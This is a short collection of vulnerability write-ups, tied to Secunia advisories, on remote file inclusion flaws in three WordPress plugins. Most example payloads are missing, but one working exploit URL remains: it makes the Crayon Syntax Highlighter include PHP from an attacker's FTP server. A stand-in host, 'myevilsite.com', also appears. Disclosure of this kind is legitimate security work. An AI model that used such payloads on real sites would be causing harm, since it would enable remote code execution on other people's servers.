WordPress Floating Social Media Link Plugins Remote File Inclusion

Advisory

Secunia Advisory SA51346

Analysis
The fsml-admin.js.php and fsml-hideshow.js.php both require a get parameter to specify the path for the wp-load.php file, used to initialize the WordPress backend.
However the wpp parameter is used without validation that it does not contain a malicious input. We can thus provide an url to malicious PHP code, which will be executed by the remote host, like this:

 

WordPress Advanced Custom Fields remote file inclusion vulnerability

Advisory

Secunia Advisory SA 51037

Analysis of vulnerability
A Remote File Inclusion vulnerability exists in the Advanced Custom Fields plugin for WordPress. By exploiting an unsafe use of array_merge which takes user-input in /core/actions/export.php, it is possible to override a value used for an include:

By posting another value for acf_abspath to the script, we can overwrite the value which is used for the two require_once calls. For instance, we can make a request like this which will request /wp-load.php and /wp-admin/admin.php from myevilsite.com:


 

WordPress Crayon Syntax Highlighter remote file inclusion vulnerability

Advisory

Secunia advisory SA 50804

Analysis of vulnerability

The Crayon Syntax highlighter implements a vulnerable RPC-like system for AJAX in /util/ajax.php and /util/preview.php. Both files share these 3 lines of code as being the first ones in both:

So it apperas that at least it attempts to do some validation. Let us see how that is implemented in global.php(Included by crayon_wp.class.php):

So it calls crayon_is_php_file which checks if the provided path is a file, the extension is “php” and the filename is what is expected, which in this case is wp-load.php. In theory, this should be safe if we assume that is_file only returns true for local file. However due to is_file also supporting FTP, we can get it to return true for a remote file on a FTP server! This means that if the server allows url includes, we can do a remote file include from a malicious FTP server hosting a wp-load.php file through an URL like this, either through ajax.php or preview.php:

http://192.168.80.130/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php